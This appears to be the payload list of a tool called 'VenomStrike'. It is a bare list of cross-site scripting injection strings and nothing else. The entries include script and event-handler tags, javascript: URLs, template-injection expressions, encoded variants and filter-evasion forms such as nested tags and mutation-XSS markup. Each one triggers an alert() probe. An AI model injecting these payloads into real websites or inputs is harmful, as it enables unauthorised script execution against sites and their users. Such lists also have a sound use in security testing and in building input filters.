# VenomStrike XSS Payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<svg/onload=alert('XSS')>
'"><script>alert('XSS')</script>
"><img src=x onerror=alert(1)>
<body onload=alert('XSS')>
<iframe src="javascript:alert('XSS')">
'-alert('XSS')-'
<input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<div style="background:url(javascript:alert(1))">
{{constructor.constructor('alert(1)')()}}
${alert(1)}
<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;img src=1 onerror=alert(1)&gt;">
<a href="javascript:alert(1)">click</a>
<img src=x onerror="&#x61;lert(1)">
%3Cscript%3Ealert('XSS')%3C/script%3E
<scr<script>ipt>alert('XSS')</scr</script>ipt>
<img """><script>alert("XSS")</script>">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<img src=`x`onerror=alert(1)>
"><svg onload=alert(String.fromCharCode(88,83,83))>
<object data="javascript:alert(1)">